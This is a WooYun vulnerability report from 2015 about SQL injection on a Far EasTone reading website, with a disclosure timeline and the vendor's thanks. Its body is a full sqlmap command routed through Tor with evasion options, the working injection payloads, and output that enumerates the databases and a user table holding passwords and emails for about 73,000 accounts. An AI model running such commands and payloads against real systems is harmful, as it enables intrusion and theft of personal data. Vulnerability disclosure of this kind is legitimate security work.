乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-25: 细节已通知厂商并且等待厂商处理中 2015-09-25: 厂商已经确认,细节仅向厂商公开 2015-10-05: 细节向核心白帽子及相关领域专家公开 2015-10-15: 细节向普通白帽子公开 2015-10-25: 细节向实习白帽子公开 2015-11-09: 细节向公众公开
台湾遠傳電信旗下某阅读网站SQL注入,影响7万用户数据
./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUT --union-char=N -u "http://**.**.**.**/FETBook/web/WebProductMain.do?pid=3" -p pid --dbs --is-dbaParameter: pid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=3' AND 1205=1205 AND 'XIiE'='XIiE Type: UNION query Title: MySQL UNION query (N) - 9 columns Payload: pid=3' UNION ALL SELECT 'N','N','N','N','N',CONCAT(0x7178717a71,0x414e4b42507654647848,0x7170766271),'N','N','N'#---[15:54:25] [INFO] the back-end DBMS is MySQLweb application technology: Apache, JSPback-end DBMS: MySQL 5available databases [7]:[*] book[*] bookold[*] drm[*] information_schema[*] mysql[*] reading_utf8[*] testDatabase: drmTable: Lib_User_Data[14 columns]+----------------------+---------------------------+| Column | Type |+----------------------+---------------------------+| Build_Date | datetime || Con_Email | varchar(255) || Device_ID | varchar(255) || Device_Register_Date | datetime || Device_Type | varchar(32) || EMail | varchar(765) || End_Date | datetime || Lib_Account | varchar(255) || Lib_User_ID | int(11) unsigned zerofill || PassWord | varchar(255) || permit | varchar(1) || permit_code | varchar(128) || Reader_Account | varchar(255) || UDN_Account | varchar(255) |+----------------------+---------------------------+Database: drm+---------------+---------+| Table | Entries |+---------------+---------+| Lib_User_Data | 73406 |+---------------+---------+
过滤
危害等级:高
漏洞Rank:12
确认时间:2015-09-25 09:47
感謝通知!
暂无